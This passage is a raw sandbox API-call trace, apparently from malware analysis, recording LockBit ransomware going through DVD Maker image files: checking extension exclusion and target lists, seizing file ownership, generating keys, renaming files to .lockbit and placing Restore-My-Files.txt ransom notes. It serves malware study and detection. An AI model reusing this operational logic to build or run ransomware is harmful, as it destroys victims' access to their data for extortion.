dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0087.873] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0087.873] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\scenesscroll.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0087.874] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\scenesscroll.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0087.874] CloseHandle (hObject=0x3c4) returned 1 [0087.874] free (_Block=0x77d800) [0087.874] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\scenesscroll.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\scenesscroll.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c4 [0087.875] CreateIoCompletionPort (FileHandle=0x3c4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0087.875] malloc (_Size=0x40068) returned 0x1ff1e60 [0087.875] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=96025) returned 1 [0087.875] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.876] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.876] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0087.876] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.876] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.876] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0087.876] ReadFile (in: hFile=0x3c4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0087.909] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\scenesscroll.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\scenesscroll.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0087.909] malloc (_Size=0xc0) returned 0x77d800 [0087.909] NtSetInformationFile (FileHandle=0x3c4, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xc0, FileInformationClass=0xa) returned 0x0 [0087.917] free (_Block=0x77d800) [0087.917] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\scenesscroll.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion") returned 1 [0087.917] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\Restore-My-Files.txt") returned 81 [0087.917] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0087.917] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f5055c0, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f5055c0, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4fd536e7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xb30, dwReserved0=0x0, dwReserved1=0x0, cFileName="specialmainsubpicture.png", cAlternateFileName="")) returned 1 [0087.917] lstrcmpiW (lpString1=".", lpString2="specialmainsubpicture.png") returned -1 [0087.918] lstrcmpiW (lpString1="..", lpString2="specialmainsubpicture.png") returned -1 [0087.918] PathFindExtensionW (pszPath="specialmainsubpicture.png") returned=".png" [0087.918] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0087.918] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0087.918] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0087.918] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0087.918] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0087.918] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0087.918] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0087.918] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0087.918] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0087.918] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0087.918] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0087.918] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0087.918] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0087.918] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0087.918] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0087.918] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0087.918] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0087.918] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0087.918] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0087.918] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0087.919] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0087.919] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0087.919] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0087.919] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0087.919] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0087.919] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0087.919] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0087.919] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0087.919] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0087.919] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0087.919] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0087.919] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0087.919] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0087.919] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0087.919] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0087.919] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0087.919] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0087.919] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0087.919] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0087.919] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0087.919] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0087.919] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0087.919] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0087.920] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0087.920] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0087.920] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0087.920] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0087.920] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="specialmainsubpicture.png") returned -1 [0087.920] lstrcmpiW (lpString1="ntldr", lpString2="specialmainsubpicture.png") returned -1 [0087.920] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="specialmainsubpicture.png") returned -1 [0087.920] lstrcmpiW (lpString1="bootsect.bak", lpString2="specialmainsubpicture.png") returned -1 [0087.920] lstrcmpiW (lpString1="autorun.inf", lpString2="specialmainsubpicture.png") returned -1 [0087.920] lstrcmpiW (lpString1="thumbs.db", lpString2="specialmainsubpicture.png") returned 1 [0087.920] lstrcmpiW (lpString1="iconcache.db", lpString2="specialmainsubpicture.png") returned -1 [0087.920] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\") returned="" [0087.920] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\specialmainsubpicture.png") returned=".png" [0087.920] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0087.920] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0087.920] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0087.920] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0087.920] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0087.920] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0087.920] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0087.920] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0087.920] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0087.920] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0087.920] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0087.920] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0087.920] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0087.921] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0087.921] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0087.921] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0087.921] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0087.921] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0087.921] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0087.921] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0087.921] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0087.921] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0087.921] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0087.921] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0087.921] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0087.921] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0087.921] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0087.921] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0087.921] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\specialmainsubpicture.png.lockbit") returned 94 [0087.921] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\specialmainsubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\specialmainsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0087.922] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0087.922] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0087.922] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0087.922] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0087.923] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0087.923] RtlFreeAnsiString (AnsiString="\\") [0087.923] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3c4) returned 0x0 [0087.923] malloc (_Size=0x200) returned 0x77d800 [0087.923] NtQueryInformationToken (in: TokenHandle=0x3c4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0087.923] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0087.923] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0087.923] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\specialmainsubpicture.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0087.924] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\specialmainsubpicture.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0087.924] CloseHandle (hObject=0x3c4) returned 1 [0087.924] free (_Block=0x77d800) [0087.924] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\specialmainsubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\specialmainsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c4 [0087.925] CreateIoCompletionPort (FileHandle=0x3c4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0087.925] malloc (_Size=0x40068) returned 0x1fb18c0 [0087.925] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=2864) returned 1 [0087.925] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.925] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.925] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0087.925] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.926] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.926] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0087.926] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0087.936] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\specialmainsubpicture.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\specialmainsubpicture.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0087.936] malloc (_Size=0xd2) returned 0x1ff1e60 [0087.937] NtSetInformationFile (FileHandle=0x3c4, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xd2, FileInformationClass=0xa) returned 0xc0000008 [0087.937] free (_Block=0x1ff1e60) [0087.937] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\specialmainsubpicture.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion") returned 1 [0087.937] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\Restore-My-Files.txt") returned 81 [0087.937] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0087.937] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f5c3c91, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f5c3c91, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4fd536e7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x12cf, dwReserved0=0x0, dwReserved1=0x0, cFileName="SpecialNavigationLeft_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0087.937] lstrcmpiW (lpString1=".", lpString2="SpecialNavigationLeft_ButtonGraphic.png") returned -1 [0087.937] lstrcmpiW (lpString1="..", lpString2="SpecialNavigationLeft_ButtonGraphic.png") returned -1 [0087.937] PathFindExtensionW (pszPath="SpecialNavigationLeft_ButtonGraphic.png") returned=".png" [0087.937] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0087.937] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0087.937] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0087.937] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0087.937] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0087.937] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0087.937] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0087.937] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0087.938] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0087.938] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0087.938] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0087.938] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0087.938] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0087.938] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0087.938] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0087.938] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0087.938] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0087.938] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0087.938] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0087.938] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0087.938] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0087.938] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0087.938] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0087.938] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0087.938] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0087.938] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0087.938] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0087.938] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0087.938] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0087.938] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0087.938] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0087.939] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0087.939] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0087.939] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0087.939] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0087.939] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0087.939] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0087.939] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0087.939] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0087.939] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0087.939] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0087.939] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0087.939] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0087.939] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0087.939] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0087.939] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0087.939] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0087.939] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SpecialNavigationLeft_ButtonGraphic.png") returned -1 [0087.939] lstrcmpiW (lpString1="ntldr", lpString2="SpecialNavigationLeft_ButtonGraphic.png") returned -1 [0087.939] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SpecialNavigationLeft_ButtonGraphic.png") returned -1 [0087.939] lstrcmpiW (lpString1="bootsect.bak", lpString2="SpecialNavigationLeft_ButtonGraphic.png") returned -1 [0087.939] lstrcmpiW (lpString1="autorun.inf", lpString2="SpecialNavigationLeft_ButtonGraphic.png") returned -1 [0087.939] lstrcmpiW (lpString1="thumbs.db", lpString2="SpecialNavigationLeft_ButtonGraphic.png") returned 1 [0087.939] lstrcmpiW (lpString1="iconcache.db", lpString2="SpecialNavigationLeft_ButtonGraphic.png") returned -1 [0087.940] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\") returned="" [0087.940] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationLeft_ButtonGraphic.png") returned=".png" [0087.940] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0087.940] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0087.940] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0087.940] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0087.940] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0087.940] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0087.940] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0087.940] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0087.940] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0087.940] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0087.940] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0087.940] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0087.940] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0087.940] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0087.940] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0087.940] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0087.940] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0087.940] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0087.940] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0087.941] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0087.941] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0087.941] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0087.941] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0087.941] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0087.941] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0087.941] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0087.941] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0087.941] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0087.941] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationLeft_ButtonGraphic.png.lockbit") returned 108 [0087.941] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\specialnavigationleft_buttongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0087.942] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0087.942] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0087.942] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0087.942] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0087.943] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0087.943] RtlFreeAnsiString (AnsiString="\\") [0087.943] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3c4) returned 0x0 [0087.943] malloc (_Size=0x200) returned 0x77d800 [0087.943] NtQueryInformationToken (in: TokenHandle=0x3c4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0087.943] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0087.943] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0087.943] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationLeft_ButtonGraphic.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0087.944] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationLeft_ButtonGraphic.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0087.944] CloseHandle (hObject=0x3c4) returned 1 [0087.944] free (_Block=0x77d800) [0087.944] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\specialnavigationleft_buttongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, 